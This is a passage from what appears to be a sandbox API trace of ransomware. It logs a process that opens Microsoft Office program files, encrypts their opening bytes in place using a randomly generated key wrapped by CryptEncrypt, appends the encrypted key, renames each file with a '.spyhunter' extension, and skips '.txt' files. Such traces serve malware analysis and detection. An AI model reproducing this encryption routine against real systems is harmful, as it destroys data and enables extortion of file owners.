lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css") returned 113 [0109.794] StrStrW (lpFirst="OliveGreen.css", lpSrch=".txt") returned 0x0 [0109.794] GetProcessHeap () returned 0x2c0000 [0109.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.794] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f7ac*=0x74b, lpOverlapped=0x0) returned 1 [0109.889] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff8b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.889] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x74b, lpNumberOfBytesWritten=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f7ac*=0x74b, lpOverlapped=0x0) returned 1 [0109.889] GetProcessHeap () returned 0x2c0000 [0109.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.889] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.889] WriteFile (in: hFile=0x154, lpBuffer=0x270f7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x270f7ec*, lpNumberOfBytesWritten=0x270f7ac*=0x4, lpOverlapped=0x0) returned 1 [0109.889] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7ac*=0x30, lpOverlapped=0x0) returned 1 [0109.889] CloseHandle (hObject=0x154) returned 1 [0109.890] GetProcessHeap () returned 0x2c0000 [0109.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0109.890] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css.spyhunter") returned 123 [0109.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\olivegreen.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\olivegreen.css.spyhunter")) returned 1 [0109.891] GetProcessHeap () returned 0x2c0000 [0109.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0109.891] GetProcessHeap () returned 0x2c0000 [0109.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.891] GetProcessHeap () returned 0x2c0000 [0109.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31baa8 | out: hHeap=0x2c0000) returned 1 [0109.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7e8 | out: pbBuffer=0x270f7e8) returned 1 [0109.891] GetProcessHeap () returned 0x2c0000 [0109.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7e0*=0x30) returned 1 [0109.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\statusonline.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico") returned 80 [0109.917] StrStrW (lpFirst="StatusOnline.ico", lpSrch=".txt") returned 0x0 [0109.917] GetProcessHeap () returned 0x2c0000 [0109.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.917] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f7a4*=0xb2e, lpOverlapped=0x0) returned 1 [0109.980] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff4d2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.980] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb2e, lpNumberOfBytesWritten=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f7a4*=0xb2e, lpOverlapped=0x0) returned 1 [0109.981] GetProcessHeap () returned 0x2c0000 [0109.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.981] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.981] WriteFile (in: hFile=0x154, lpBuffer=0x270f7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x270f7e4*, lpNumberOfBytesWritten=0x270f7a4*=0x4, lpOverlapped=0x0) returned 1 [0109.981] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7a4*=0x30, lpOverlapped=0x0) returned 1 [0109.981] CloseHandle (hObject=0x154) returned 1 [0109.991] GetProcessHeap () returned 0x2c0000 [0109.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0109.991] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico.spyhunter") returned 90 [0109.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\statusonline.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\statusonline.ico.spyhunter")) returned 1 [0109.992] GetProcessHeap () returned 0x2c0000 [0109.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0109.992] GetProcessHeap () returned 0x2c0000 [0109.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.992] GetProcessHeap () returned 0x2c0000 [0109.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c995c0 | out: hHeap=0x2c0000) returned 1 [0109.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7e8 | out: pbBuffer=0x270f7e8) returned 1 [0109.992] GetProcessHeap () returned 0x2c0000 [0109.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7e0*=0x30) returned 1 [0109.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\imdimp.add"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0109.994] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD") returned 57 [0109.994] StrStrW (lpFirst="IMDIMP.ADD", lpSrch=".txt") returned 0x0 [0109.994] GetProcessHeap () returned 0x2c0000 [0109.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.994] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f7a4*=0x2800, lpOverlapped=0x0) returned 1 [0110.009] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.010] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f7a4*=0x2800, lpOverlapped=0x0) returned 1 [0110.010] GetProcessHeap () returned 0x2c0000 [0110.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0110.010] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.010] WriteFile (in: hFile=0xec, lpBuffer=0x270f7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x270f7e4*, lpNumberOfBytesWritten=0x270f7a4*=0x4, lpOverlapped=0x0) returned 1 [0110.081] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7a4*=0x30, lpOverlapped=0x0) returned 1 [0110.081] CloseHandle (hObject=0xec) returned 1 [0110.091] GetProcessHeap () returned 0x2c0000 [0110.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0110.092] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD.spyhunter") returned 67 [0110.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\imdimp.add"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\imdimp.add.spyhunter")) returned 1 [0110.817] GetProcessHeap () returned 0x2c0000 [0110.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0110.817] GetProcessHeap () returned 0x2c0000 [0110.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0110.817] GetProcessHeap () returned 0x2c0000 [0110.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331e80 | out: hHeap=0x2c0000) returned 1 [0110.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7e0 | out: pbBuffer=0x270f7e0) returned 1 [0110.817] GetProcessHeap () returned 0x2c0000 [0110.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0110.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7d8*=0x30) returned 1 [0110.817] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL" (normalized: "c:\\program files\\microsoft office\\office14\\logmodel.mdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0110.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL") returned 59 [0110.818] StrStrW (lpFirst="LOGMODEL.MDL", lpSrch=".txt") returned 0x0 [0110.818] GetProcessHeap () returned 0x2c0000 [0110.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0110.818] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f79c*=0x2800, lpOverlapped=0x0) returned 1 [0110.846] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.846] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f79c*=0x2800, lpOverlapped=0x0) returned 1 [0110.846] GetProcessHeap () returned 0x2c0000 [0110.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0110.846] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.846] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x270f7dc*, lpNumberOfBytesWritten=0x270f79c*=0x4, lpOverlapped=0x0) returned 1 [0110.863] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f79c*=0x30, lpOverlapped=0x0) returned 1 [0110.863] CloseHandle (hObject=0x16c) returned 1 [0110.863] GetProcessHeap () returned 0x2c0000 [0110.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0110.864] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL.spyhunter") returned 69 [0110.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL" (normalized: "c:\\program files\\microsoft office\\office14\\logmodel.mdl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\logmodel.mdl.spyhunter")) returned 1 [0110.864] GetProcessHeap () returned 0x2c0000 [0110.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0110.865] GetProcessHeap () returned 0x2c0000 [0110.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0110.865] GetProcessHeap () returned 0x2c0000 [0110.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x332c00 | out: hHeap=0x2c0000) returned 1 [0110.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7e0 | out: pbBuffer=0x270f7e0) returned 1 [0110.865] GetProcessHeap () returned 0x2c0000 [0110.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0110.865] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7d8*=0x30) returned 1 [0110.865] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.dll" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0110.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.dll") returned 73 [0110.929] StrStrW (lpFirst="Microsoft.BusinessData.dll", lpSrch=".txt") returned 0x0 [0110.929] GetProcessHeap () returned 0x2c0000 [0110.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0110.929] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f79c*=0x2800, lpOverlapped=0x0) returned 1 [0110.931] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.931] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f79c*=0x2800, lpOverlapped=0x0) returned 1 [0110.932] GetProcessHeap () returned 0x2c0000 [0110.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0110.932] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.932] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x270f7dc*, lpNumberOfBytesWritten=0x270f79c*=0x4, lpOverlapped=0x0) returned 1 [0110.932] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f79c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f79c*=0x30, lpOverlapped=0x0) returned 1 [0110.932] CloseHandle (hObject=0x16c) returned 1 [0110.932] GetProcessHeap () returned 0x2c0000 [0110.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0110.932] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.dll.spyhunter") returned 83 [0110.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.dll" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.dll.spyhunter")) returned 1 [0110.933] GetProcessHeap () returned 0x2c0000 [0110.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0110.933] GetProcessHeap () returned 0x2c0000 [0110.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0110.933] GetProcessHeap () returned 0x2c0000 [0110.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ceb200 | out: hHeap=0x2c0000) returned 1 [0110.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7d8 | out: pbBuffer=0x270f7d8) returned 1 [0110.934] GetProcessHeap () returned 0x2c0000 [0110.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0110.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7d0*=0x30) returned 1 [0110.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnOL.dll" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnol.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0110.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnOL.dll") returned 59 [0110.935] StrStrW (lpFirst="ONBttnOL.dll", lpSrch=".txt") returned 0x0 [0110.935] GetProcessHeap () returned 0x2c0000 [0110.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0110.935] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f794*=0x2800, lpOverlapped=0x0) returned 1 [0111.342] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.342] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f794*=0x2800, lpOverlapped=0x0) returned 1 [0111.342] GetProcessHeap () returned 0x2c0000 [0111.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.342] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.342] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x270f7d4*, lpNumberOfBytesWritten=0x270f794*=0x4, lpOverlapped=0x0) returned 1 [0111.442] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f794*=0x30, lpOverlapped=0x0) returned 1 [0111.442] CloseHandle (hObject=0x16c) returned 1 [0111.442] GetProcessHeap () returned 0x2c0000 [0111.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.442] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnOL.dll.spyhunter") returned 69 [0111.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnOL.dll" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnol.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnOL.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnol.dll.spyhunter")) returned 1 [0111.443] GetProcessHeap () returned 0x2c0000 [0111.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.444] GetProcessHeap () returned 0x2c0000 [0111.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0111.444] GetProcessHeap () returned 0x2c0000 [0111.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2be60 | out: hHeap=0x2c0000) returned 1 [0111.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7d8 | out: pbBuffer=0x270f7d8) returned 1 [0111.444] GetProcessHeap () returned 0x2c0000 [0111.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0111.444] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7d0*=0x30) returned 1 [0111.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPRPT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\proprpt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0111.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPRPT.DLL") returned 58 [0111.445] StrStrW (lpFirst="PROPRPT.DLL", lpSrch=".txt") returned 0x0 [0111.445] GetProcessHeap () returned 0x2c0000 [0111.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.446] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f794*=0x2800, lpOverlapped=0x0) returned 1 [0111.519] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.519] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f794*=0x2800, lpOverlapped=0x0) returned 1 [0111.519] GetProcessHeap () returned 0x2c0000 [0111.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.519] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.519] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x270f7d4*, lpNumberOfBytesWritten=0x270f794*=0x4, lpOverlapped=0x0) returned 1 [0111.522] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f794, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f794*=0x30, 